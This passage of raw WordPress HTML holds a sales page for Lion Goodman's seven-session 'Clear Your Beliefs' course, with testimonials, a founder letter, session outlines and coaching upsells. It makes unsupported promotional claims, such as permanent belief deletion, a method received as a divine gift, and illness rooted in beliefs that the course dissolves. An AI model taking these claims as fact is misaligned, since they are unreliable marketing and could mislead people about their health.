underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body. \r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Optional: Get Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>You can take this journey on your own, one recorded session at a time. You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> a trained professional who will accompany you on your journey, and guide you through the process.  Our outstanding coaches are qualified to help you deal with almost any issue, in any part of your life, regardless of how long it''s been interfering with your success, joy, and freedom. He or she will safely guide you down to the deepest levels of your psyche  – which can be difficult to get to all by yourself, yet it''s where the most powerful changes are born. Your Coach will meet with you by phone (or Skype) each week, at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, throughout the U.S. and Canada, and from Europe to Australia, and from South Africa to Scandinavia. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my 